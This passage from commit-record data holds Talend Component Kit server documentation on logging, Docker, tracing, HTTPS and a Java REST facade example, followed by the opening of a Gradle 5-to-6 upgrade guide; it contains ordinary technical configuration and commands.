version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n[16:59:58.198][INFO ][ main][oyote.http11.Http11NioProtocol] Initializing ProtocolHandler [\"http-nio-34763\"]\n----\n\n- JSON logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Properties>\n <!-- DO NOT PUT logSource there, it is useless and slow -->\n <Property name=\"jsonLayout\">{\"severity\":\"%level\",\"logMessage\":\"%encode{%message}{JSON}\",\"logTimestamp\":\"%d{ISO8601}{UTC}\",\"eventUUID\":\"%uuid{RANDOM}\",\"@version\":\"1\",\"logger.name\":\"%encode{%logger}{JSON}\",\"host.name\":\"${hostName}\",\"threadName\":\"%encode{%thread}{JSON}\",\"stackTrace\":\"%encode{%xThrowable{full}}{JSON}\"}%n<\/Property>\n <\/Properties>\n <Appenders>\n <Console name=\"Console\" target=\"SYSTEM_OUT\">\n <PatternLayout pattern=\"${jsonLayout}\"\/>\n <\/Console>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"Console\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n{\"severity\":\"INFO\",\"logMessage\":\"Initializing ProtocolHandler [\\\"http-nio-46421\\\"]\",\"logTimestamp\":\"2017-11-20T16:04:01,763\",\"eventUUID\":\"8b998e17-7045-461c-8acb-c43f21d995ff\",\"@version\":\"1\",\"logger.name\":\"org.apache.coyote.http11.Http11NioProtocol\",\"host.name\":\"TLND-RMANNIBUCAU\",\"threadName\":\"main\",\"stackTrace\":\"\"}\n----\n\n- Rolling file appender:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n <Appenders>\n <RollingRandomAccessFile name=\"File\" fileName=\"${LOG_PATH}\/application.log\" filePattern=\"${LOG_PATH}\/application-%d{yyyy-MM-dd}.log\">\n <PatternLayout 
pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n <Policies>\n <SizeBasedTriggeringPolicy size=\"100 MB\" \/>\n <TimeBasedTriggeringPolicy interval=\"1\" modulate=\"true\"\/>\n <\/Policies>\n <\/RollingRandomAccessFile>\n <\/Appenders>\n <Loggers>\n <Root level=\"INFO\">\n <AppenderRef ref=\"File\"\/>\n <\/Root>\n <\/Loggers>\n<\/Configuration>\n----\n\nMore details are available in the link:https:\/\/logging.apache.org\/log4j\/2.x\/manual\/appenders.html#RollingFileAppender[RollingFileAppender] documentation.\n\nTIP: You can compose previous layout (message format) and appenders (where logs are written).\n\ninclude::server-uispec.adoc[leveloffset=+1]\n\n== Docker\n\nThe server image is deployed on Docker. Its version is suffixed with a timestamp to ensure\nimages are not overriden and can break your usage. You can check the available version on Docker hub.\n\n\n=== Run\n\nYou can run the docker image by executing this command :\n\n[source,sh]\n----\n$ sudo docker run -p 8080:8080 tacokit\/component-starter\n----\n\n=== Configure\n\nYou can set the env variable `MEECROWAVE_OPTS` to customize the server, by default it is installed in `\/opt\/talend\/component-kit`.\n\n=== Maven repository\n\nThe maven repository is the default one of the machine, you can change it setting the system property\n`talend_component_server_maven_repository=\/path\/to\/your\/m2`.\n\n==== Deploy components to the server\n\nIf you want to deploy some components you can configure which ones in MEECROWAVE_OPTS (see server doc online)\nand redirect your local m2:\n\n[source,sh]\n----\n$ docker run \\\n -p 8080:8080 \\\n -v ~\/.m2:\/root\/.m2 \\\n -e MEECROWAVE_OPTS=\"-Dtalend.component.server.component.coordinates=g:a:v,g2:a2:v2,...\" \\\n component-server\n----\n\n=== Logging\n\nThe component server docker image comes with two log4j2 profile `default` and `kafka`.\nThe logging profile can be changed by setting the environment variable `TALEND_COMPONENT_LOG4J2_PROFILE` to `kafka`\nthe `default` profile is active by default.\n\n==== default profile\n\nThe *default* profile has file and console logging capabilities.\nThe console logging is off by default and you can activate it by setting `CONSOLE_LOG_LEVEL` environment variable\nto `DEBUG`, `INFO`, `WARN` or any other log level supported by log4j2. In practise and during development you will want\nto see the logs without connecting to the server by activating console logging.\n\nRun docker image with console logging\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e CONSOLE_LOG_LEVEL=INFO \\\n\tcomponent-server\n----\n\n==== Kafka profile\n\n*Kafka* profile let you send log to Kafka servers. 
The logs are formatted in JSON and follow the layout defined by Talend\nand described at https:\/\/github.com\/Talend\/daikon\/tree\/master\/daikon-logging\/logging-event-layout\n\nThis profile requires two environment variables:\n\n* `LOG_KAFKA_TOPIC` : Kafka topic.\n* `LOG_KAFKA_URL` : A list of host\/port pairs to use for establishing the initial connection to the Kafka cluster.\nThis list should be in the form `url:port` separated by `,`\n\nRun the Docker image with the Kafka profile:\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e TALEND_COMPONENT_LOG4J2_PROFILE=kafka \\\n -e LOG_KAFKA_URL=`log kafka url:port` \\\n -e LOG_KAFKA_TOPIC=`log kafka topic` \\\n\t-e TRACING_KAFKA_URL=`tracing kafka url:port` \\\n\t-e TRACING_KAFKA_TOPIC=`tracing kafka topic` \\\n\ttacokit\/component-server\n----\n\n*Note*: `LOG_KAFKA_TOPIC` will receive the application and the access logs\nand `TRACING_KAFKA_TOPIC` will receive brave tracing logs.\n\n==== Tracing (Brave Monitoring)\n\nThe component server uses https:\/\/github.com\/openzipkin\/brave to monitor requests.\n\nTracing can be activated by setting the environment variable `TRACING_ON` to `true`.\n\nYou can choose the reporter type by setting the `talend_component_server_monitoring_brave_reporter_type` environment variable\nto `log` (this is the default value in this Docker image) or to `noop`,\nwhich deactivates the tracing. __Other types of reporters may be added in the future.__\n\nThe tracing rate is configurable by setting the environment variable `TRACING_SAMPLING_RATE`.\nThis is the default sample rate for all the endpoints and has a default value of 0.1.\n\nYou can define more accurate rates for every component server endpoint using those environment variables:\n\n[options=\"header,autowidth\"]\n|===\n| Environment variable | Endpoint\n| `talend_component_server_monitoring_brave_sampling_environment_rate` | `\/api\/v1\/environment`\n| `talend_component_server_monitoring_brave_sampling_configurationtype_rate` | `\/api\/v1\/configurationtype`\n| `talend_component_server_monitoring_brave_sampling_component_rate` | `\/api\/v1\/component`\n| `talend_component_server_monitoring_brave_sampling_documentation_rate` | `\/api\/v1\/documentation`\n| `talend_component_server_monitoring_brave_sampling_action_rate` | `\/api\/v1\/action`\n| `talend_component_server_monitoring_brave_sampling_execution_rate` | `\/api\/v1\/execution`\n|===\n\nRun the Docker image with tracing on:\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n\t-e TRACING_ON=true \\\n\t-e TRACING_SAMPLING_RATE=0.1 \\\n\ttacokit\/component-server\n----\n\n=== Build the image yourself\n\nYou can build the component starter server Docker image by following these instructions:\n\n[source,sh]\n----\ndocker build --build-arg ARTIFACT_ID=component-starter-server \\\n --build-arg SERVER_VERSION=`component starter server version` \\\n --tag tacokit\/component-server .\n----\n\nIMPORTANT: This assumes the project is built before you run that command.\n
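Once built, a quick smoke test (a sketch assuming the tag used above and the default port) is to start the image and query one of the endpoints listed earlier:\n\n[source,sh]\n----\ndocker run -p 8080:8080 tacokit\/component-server\n# from another terminal\ncurl http:\/\/localhost:8080\/api\/v1\/environment\n----\n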
It is a standalone Java HTTP server.\n\nTIP: The WebSocket protocol is activated for the endpoints. Endpoints then use `\/websocket\/v1` as base instead of `\/api\/v1`. See <<websocket-transport,WebSocket>> for more details.\n\nHere is the API:\n\ninclude::{partialsdir}\/generated_rest-resources.adoc[leveloffset=+2]\n\nIMPORTANT: To make sure that the migration can be enabled, you need to set the version the component was created with in the execution configuration that you send to the server (component version is in component the detail endpoint). To do that, use `tcomp::component::version` key.\n\n=== Deprecated endpoints\n\nEndpoints that are intended to disappear will be deprecated. A `X-Talend-Warning` header will be returned with a message as value.\n\n[[websocket-transport]]\n=== WebSocket transport\n\nYou can connect yo any endpoint by:\n\n. Replacing `\/api` with `\/websocket`\n. Appending `\/<http method>` to the URL\n. Formatting the request as:\n\n[source]\n----\nSEND\ndestination: <endpoint after v1>\n<headers>\n\n<payload>^@\n----\n\nFor example:\n\n[source]\n----\nSEND\ndestination: \/component\/index\nAccept: application\/json\n\n^@\n----\n\nThe response is formatted as follows:\n\n[source]\n----\nMESSAGE\nstatus: <http status code>\n<headers>\n\n<payload>^@\n----\n\nTIP: All endpoints are logged at startup. You can then find them in the logs if you have a doubt about which one to use.\n\nIf you don't want to create a pool of connections per endpoint\/verb, you can use the bus endpoint: `\/websocket\/v1\/bus`.\nThis endpoint requires that you add the `destinationMethod` header to each request with the verb value (`GET` by default):\n\n[source]\n----\nSEND\ndestination: \/component\/index\ndestinationMethod: GET\nAccept: application\/json\n\n^@\n----\n\n== HTTPS activation\n\nUsing the server ZIP (or https:\/\/github.com\/Talend\/component-runtime\/blob\/master\/.docker\/Dockerfile[Docker image]), you can configure HTTPS by adding properties to `MEECROWAVE_OPTS`. 
Assuming that you have a certificate in `\/opt\/certificates\/component.p12` (don't forget to add\/mount it in the Docker image if you use it), you can activate it as follows:\n\n[source,bash]\n----\n# use -e for Docker\n#\n# this skips the http port binding and only binds https on the port 8443, and sets up the correct certificate\nexport MEECROWAVE_OPTS=\"-Dskip-http=true -Dssl=true -Dhttps=8443 -Dkeystore-type=PKCS12 -Dkeystore-alias=talend -Dkeystore-password=talend -Dkeystore-file=\/opt\/certificates\/component.p12\"\n----\n
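\nIf you only need a throw-away certificate for local testing, a self-signed PKCS12 keystore matching the alias, password and path used above can be generated with the JDK `keytool` (all values are assumptions to adapt):\n\n[source,sh]\n----\nkeytool -genkeypair -alias talend -storetype PKCS12 -keyalg RSA -validity 365 \\\n -keystore \/opt\/certificates\/component.p12 -storepass talend -dname CN=localhost\n----\n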
\n== Web forms and REST API\n\nThe `component-form` library provides a way to build a component REST API facade that is compatible with the React form library.\n\nFor example:\n\n[source,java]\n----\n@Path(\"tacokit-facade\")\n@ApplicationScoped\npublic class ComponentFacade {\n    private static final String[] EMPTY_ARRAY = new String[0];\n\n    @Inject\n    private Client client;\n\n    @Inject\n    private ActionService actionService;\n\n    @Inject\n    private UiSpecService uiSpecService;\n\n    @Inject \/\/ assuming it is available in your app, use any client you want\n    private WebTarget target;\n\n    \/\/ executes a component action and maps the raw result for the UI\n    @POST\n    @Path(\"action\")\n    public void action(@Suspended final AsyncResponse response, @QueryParam(\"family\") final String family,\n            @QueryParam(\"type\") final String type, @QueryParam(\"action\") final String action,\n            final Map<String, Object> params) {\n        client.action(family, type, action, params).handle((r, e) -> {\n            if (e != null) {\n                onException(response, e);\n            } else {\n                response.resume(actionService.map(type, r));\n            }\n            return null;\n        });\n    }\n\n    \/\/ lists the available components and rewrites the links to point to this facade\n    @GET\n    @Path(\"index\")\n    public void getIndex(@Suspended final AsyncResponse response,\n            @QueryParam(\"language\") @DefaultValue(\"en\") final String language) {\n        target\n                .path(\"component\/index\")\n                .queryParam(\"language\", language)\n                .request(APPLICATION_JSON_TYPE)\n                .rx()\n                .get(ComponentIndices.class)\n                .toCompletableFuture()\n                .handle((index, e) -> {\n                    if (e != null) {\n                        onException(response, e);\n                    } else {\n                        index.getComponents().stream().flatMap(c -> c.getLinks().stream()).forEach(\n                                link -> link.setPath(link.getPath().replaceFirst(\"\/component\/\", \"\/application\/\").replace(\n                                        \"\/details?identifiers=\", \"\/detail\/\")));\n                        response.resume(index);\n                    }\n                    return null;\n                });\n    }\n\n    \/\/ fetches one component detail and converts it to the UiSpec model\n    @GET\n    @Path(\"detail\/{id}\")\n    public void getDetail(@Suspended final AsyncResponse response,\n            @QueryParam(\"language\") @DefaultValue(\"en\") final String language, @PathParam(\"id\") final String id) {\n        target\n                .path(\"component\/details\")\n                .queryParam(\"language\", language)\n                .queryParam(\"identifiers\", id)\n                .request(APPLICATION_JSON_TYPE)\n                .rx()\n                .get(ComponentDetailList.class)\n                .toCompletableFuture()\n                .thenCompose(result -> uiSpecService.convert(result.getDetails().iterator().next()))\n                .handle((result, e) -> {\n                    if (e != null) {\n                        onException(response, e);\n                    } else {\n                        response.resume(result);\n                    }\n                    return null;\n                });\n    }\n\n    \/\/ maps transport\/server failures to a UI friendly payload\n    private void onException(final AsyncResponse response, final Throwable e) {\n        final UiActionResult payload;\n        final int status;\n        if (WebException.class.isInstance(e)) {\n            final WebException we = WebException.class.cast(e);\n            status = we.getStatus();\n            payload = actionService.map(we);\n        } else if (CompletionException.class.isInstance(e)) {\n            final CompletionException actualException = CompletionException.class.cast(e);\n            log.error(actualException.getMessage(), actualException);\n            status = Response.Status.BAD_GATEWAY.getStatusCode();\n            payload = actionService.map(new WebException(actualException, -1, emptyMap()));\n        } else {\n            log.error(e.getMessage(), e);\n            status = Response.Status.BAD_GATEWAY.getStatusCode();\n            payload = actionService.map(new WebException(e, -1, emptyMap()));\n        }\n        response.resume(new WebApplicationException(Response.status(status).entity(payload).build()));\n    }\n}\n----\n\nNOTE: The `Client` can be created using `ClientFactory.createDefault(System.getProperty(\"app.components.base\", \"http:\/\/localhost:8080\/api\/v1\"))` and the service can be a simple `new UiSpecService<>()`. The factory uses JAX-RS if the API is available (assuming a JSON-B provider is registered). Otherwise, it tries to use Spring.\n\nThe conversion from the component model (REST API) to the uiSpec model is done through `UiSpecService`. It is based on the object model which is mapped to a UI model. Having a flat model in the component REST API allows you to customize layers easily.\n\nYou can completely control the available components, tune the rendering by switching the `uiSchema`, and add or remove parts of the form.\nYou can also add custom actions and buttons for specific needs of the application.\n\nNOTE: The\u00a0`\/migrate` endpoint was not shown in the previous snippet but if you need it, add it as well.\n\n=== Using the UiSpec model without the tooling\n\n[source,xml]\n----\n<dependency>\n  <groupId>org.talend.sdk.component<\/groupId>\n  <artifactId>component-form-model<\/artifactId>\n  <version>${talend-component-kit.version}<\/version>\n<\/dependency>\n----\n\nThis Maven dependency provides the UiSpec model classes. You can use the `Ui` API (with or without the builders) to create UiSpec representations.\n\nFor example:\n\n[source,java]\n----\nfinal Ui form1 = ui()\n    .withJsonSchema(JsonSchema.jsonSchemaFrom(Form1.class).build()) <1>\n    .withUiSchema(uiSchema() <2>\n        .withKey(\"multiSelectTag\")\n        .withRestricted(false)\n        .withTitle(\"Simple multiSelectTag\")\n        .withDescription(\"This data list accepts values that are not in the list of suggestions\")\n        .withWidget(\"multiSelectTag\")\n        .build())\n    .withProperties(myFormInstance) <3>\n    .build();\n\nfinal String json = jsonb.toJson(form1); <4>\n----\n<1> The `JsonSchema` is extracted from reflection on the `Form1` class. Note that `@JsonSchemaIgnore` allows you to ignore a field and `@JsonSchemaProperty` allows you to rename a property.\n<2> A `UiSchema` is programmatically built using the builder API.\n<3> An instance of the form is passed to let the serializer extract its JSON model.\n<4> The `Ui` model, which can be used by UiSpec compatible front widgets, is serialized.\n\nThe model uses the JSON-B API to define the binding. Make sure to have an implementation in your classpath. 
To do that, add the following dependencies:\n\n[source,xml]\n----\n<dependency>\n  <groupId>org.apache.geronimo.specs<\/groupId>\n  <artifactId>geronimo-jsonb_1.0_spec<\/artifactId>\n  <version>1.0<\/version>\n<\/dependency>\n<dependency>\n  <groupId>org.apache.geronimo.specs<\/groupId>\n  <artifactId>geronimo-json_1.1_spec<\/artifactId>\n  <version>1.0<\/version>\n<\/dependency>\n<dependency>\n  <groupId>org.apache.johnzon<\/groupId>\n  <artifactId>johnzon-jsonb<\/artifactId>\n  <version>${johnzon.version}<\/version> <!-- 1.1.5 for instance -->\n<\/dependency>\n----\n\n=== JavaScript integration\n\nIMPORTANT: `component-kit.js` is no longer available (previous versions stay on NPM) since it was replaced by `@talend\/react-containers`.\nThe previous import can be replaced by `import kit from '@talend\/react-containers\/lib\/ComponentForm\/kit';`.\n\nDefault JavaScript integration goes through the link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/forms[Talend UI Forms] library\nand its link:https:\/\/github.com\/Talend\/ui\/tree\/master\/packages\/containers[Containers] wrapper.\n\nDocumentation is available through the previous links.\n\n== Logging\n\nThe logging uses Log4j2. You can specify a custom configuration by using the `-Dlog4j.configurationFile` system property or by adding a `log4j2.xml` file to the classpath.\n\nHere are some common configurations:\n\n- Console logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n  <Appenders>\n    <Console name=\"Console\" target=\"SYSTEM_OUT\">\n      <PatternLayout pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n    <\/Console>\n  <\/Appenders>\n  <Loggers>\n    <Root level=\"INFO\">\n      <AppenderRef ref=\"Console\"\/>\n    <\/Root>\n  <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n[16:59:58.198][INFO ][           main][oyote.http11.Http11NioProtocol] Initializing ProtocolHandler [\"http-nio-34763\"]\n----\n\n- JSON logging:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n  <Properties>\n    <!-- DO NOT PUT logSource there, it is useless and slow -->\n    <Property name=\"jsonLayout\">{\"severity\":\"%level\",\"logMessage\":\"%encode{%message}{JSON}\",\"logTimestamp\":\"%d{ISO8601}{UTC}\",\"eventUUID\":\"%uuid{RANDOM}\",\"@version\":\"1\",\"logger.name\":\"%encode{%logger}{JSON}\",\"host.name\":\"${hostName}\",\"threadName\":\"%encode{%thread}{JSON}\",\"stackTrace\":\"%encode{%xThrowable{full}}{JSON}\"}%n<\/Property>\n  <\/Properties>\n  <Appenders>\n    <Console name=\"Console\" target=\"SYSTEM_OUT\">\n      <PatternLayout pattern=\"${jsonLayout}\"\/>\n    <\/Console>\n  <\/Appenders>\n  <Loggers>\n    <Root level=\"INFO\">\n      <AppenderRef ref=\"Console\"\/>\n    <\/Root>\n  <\/Loggers>\n<\/Configuration>\n----\n\nOutput messages look like:\n\n[source]\n----\n{\"severity\":\"INFO\",\"logMessage\":\"Initializing ProtocolHandler [\\\"http-nio-46421\\\"]\",\"logTimestamp\":\"2017-11-20T16:04:01,763\",\"eventUUID\":\"8b998e17-7045-461c-8acb-c43f21d995ff\",\"@version\":\"1\",\"logger.name\":\"org.apache.coyote.http11.Http11NioProtocol\",\"host.name\":\"TLND-RMANNIBUCAU\",\"threadName\":\"main\",\"stackTrace\":\"\"}\n----\n\n- Rolling file appender:\n\n[source,xml]\n----\n<?xml version=\"1.0\"?>\n<Configuration status=\"INFO\">\n  <Appenders>\n    <RollingRandomAccessFile name=\"File\" fileName=\"${LOG_PATH}\/application.log\" filePattern=\"${LOG_PATH}\/application-%d{yyyy-MM-dd}.log\">\n      <PatternLayout 
pattern=\"[%d{HH:mm:ss.SSS}][%highlight{%-5level}][%15.15t][%30.30logger] %msg%n\"\/>\n      <Policies>\n        <SizeBasedTriggeringPolicy size=\"100 MB\" \/>\n        <TimeBasedTriggeringPolicy interval=\"1\" modulate=\"true\"\/>\n      <\/Policies>\n    <\/RollingRandomAccessFile>\n  <\/Appenders>\n  <Loggers>\n    <Root level=\"INFO\">\n      <AppenderRef ref=\"File\"\/>\n    <\/Root>\n  <\/Loggers>\n<\/Configuration>\n----\n\nMore details are available in the link:https:\/\/logging.apache.org\/log4j\/2.x\/manual\/appenders.html#RollingFileAppender[RollingFileAppender] documentation.\n\nTIP: You can compose the previous layouts (message format) and appenders (where logs are written).\n\ninclude::server-uispec.adoc[leveloffset=+1]\n\n== Docker\n\nThe server image is deployed on Docker. Its version is suffixed with a timestamp to ensure\nimages are not overridden, which could break your usage. You can check the available versions on Docker Hub.\n\n=== Run\n\nYou can run the docker image by executing this command:\n\n[source,sh]\n----\n$ sudo docker run -p 8080:8080 tacokit\/component-starter\n----\n\n=== Configure\n\nYou can set the environment variable `MEECROWAVE_OPTS` to customize the server. By default, it is installed in `\/opt\/talend\/component-kit`.\n\n=== Maven repository\n\nThe maven repository is the default one of the machine; you can change it by setting the system property\n`talend_component_server_maven_repository=\/path\/to\/your\/m2`.\n\n==== Deploy components to the server\n\nIf you want to deploy some components, you can configure which ones in `MEECROWAVE_OPTS` (see the server documentation online)\nand redirect your local m2:\n\n[source,sh]\n----\n$ docker run \\\n -p 8080:8080 \\\n -v ~\/.m2:\/root\/.m2 \\\n -e MEECROWAVE_OPTS=\"-Dtalend.component.server.component.coordinates=g:a:v,g2:a2:v2,...\" \\\n component-server\n----\n\n=== Logging\n\nThe component server docker image comes with two log4j2 profiles: `default` and `kafka`.\nThe logging profile can be changed by setting the environment variable `TALEND_COMPONENT_LOG4J2_PROFILE` to `kafka`;\nthe `default` profile is active by default.\n\n==== Default profile\n\nThe *default* profile has file and console logging capabilities.\nThe console logging is off by default; you can activate it by setting the `CONSOLE_LOG_LEVEL` environment variable\nto `DEBUG`, `INFO`, `WARN` or any other log level supported by log4j2. In practice, during development you will want\nto see the logs without connecting to the server, by activating console logging.\n\nRun the docker image with console logging:\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e CONSOLE_LOG_LEVEL=INFO \\\n component-server\n----\n
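\nOnce the container is running, you can follow its output without attaching to it (the container name is an assumption, use `docker ps` to find yours):\n\n[source,sh]\n----\nsudo docker logs -f component-server\n----\n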
\n==== Kafka profile\n\nThe *Kafka* profile lets you send logs to Kafka servers.\nThe logs are formatted in JSON and follow the layout defined by Talend,\ndescribed here: https:\/\/github.com\/Talend\/daikon\/tree\/master\/daikon-logging\/logging-event-layout.\n\nThis profile requires two environment variables:\n\n* `LOG_KAFKA_TOPIC`: the Kafka topic.\n* `LOG_KAFKA_URL`: a list of host\/port pairs used to establish the initial connection to the Kafka cluster.\nThis list should be in the form `url:port`, separated by `,`.\n\nRun the docker image with the Kafka profile:\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e TALEND_COMPONENT_LOG4J2_PROFILE=kafka \\\n -e LOG_KAFKA_URL=`log kafka url:port` \\\n -e LOG_KAFKA_TOPIC=`log kafka topic` \\\n -e TRACING_KAFKA_URL=`tracing kafka url:port` \\\n -e TRACING_KAFKA_TOPIC=`tracing kafka topic` \\\n tacokit\/component-server\n----\n\n*Note*: `LOG_KAFKA_TOPIC` receives the application and access logs,\nwhile `TRACING_KAFKA_TOPIC` receives the Brave tracing logs.\n\n==== Tracing (Brave Monitoring)\n\nThe component server uses https:\/\/github.com\/openzipkin\/brave to monitor requests.\n\nThe tracing can be activated by setting the environment variable `TRACING_ON` to `true`.\n\nYou can choose the reporter type by setting the `talend_component_server_monitoring_brave_reporter_type` environment variable\nto `log` (the default value in this docker image) or to `noop`,\nwhich deactivates the tracing. __Other types of reporters may be added in the future.__\n\nThe tracing rate is configurable by setting the environment variable `TRACING_SAMPLING_RATE`.\nThis is the default sample rate for all the endpoints and has a default value of 0.1.\n\nYou can define a more accurate rate for every component server endpoint using these environment variables:\n\n[options=\"header,autowidth\"]\n|===\n| Environment variable | Endpoint\n| `talend_component_server_monitoring_brave_sampling_environment_rate` | `\/api\/v1\/environment`\n| `talend_component_server_monitoring_brave_sampling_configurationtype_rate` | `\/api\/v1\/configurationtype`\n| `talend_component_server_monitoring_brave_sampling_component_rate` | `\/api\/v1\/component`\n| `talend_component_server_monitoring_brave_sampling_documentation_rate` | `\/api\/v1\/documentation`\n| `talend_component_server_monitoring_brave_sampling_action_rate` | `\/api\/v1\/action`\n| `talend_component_server_monitoring_brave_sampling_execution_rate` | `\/api\/v1\/execution`\n|===\n\nRun the docker image with tracing on:\n\n[source,sh]\n----\nsudo docker run -p 8080:8080 \\\n -e TRACING_ON=true \\\n -e TRACING_SAMPLING_RATE=0.1 \\\n tacokit\/component-server\n----\n\n=== Build the image yourself\n\nYou can build the component starter server docker image following these instructions:\n\n[source,sh]\n----\ndocker build --build-arg ARTIFACT_ID=component-starter-server \\\n --build-arg SERVER_VERSION=`component starter server version` \\\n --tag tacokit\/component-server .\n----\n\nIMPORTANT: this assumes the project is built before you run that command.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"0fba880e049b50b4562e3a4b838c22eb8ead3047","subject":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","message":"Update subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc\n\nCo-Authored-By: Sterling Greene 
<f8dc2ca1b24f71bd07cf2580bf789fed70c9e45c@users.noreply.github.com>","repos":"gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/      http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other source sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n
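\nA minimal before\/after sketch of such a migration (the coordinates are arbitrary examples):\n\n```\ndependencies {\n    \/\/ was: compile 'org.apache.commons:commons-lang3:3.9'\n    implementation 'org.apache.commons:commons-lang3:3.9'\n\n    \/\/ was: testCompile 'junit:junit:4.12'\n    testImplementation 'junit:junit:4.12'\n}\n```\n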
\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache, the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and an ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` have been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now, archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can specify that explicitly:\n\n```\ntask archive(type: Zip) {\n    duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n    archiveName = 'archive.zip'\n    from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible 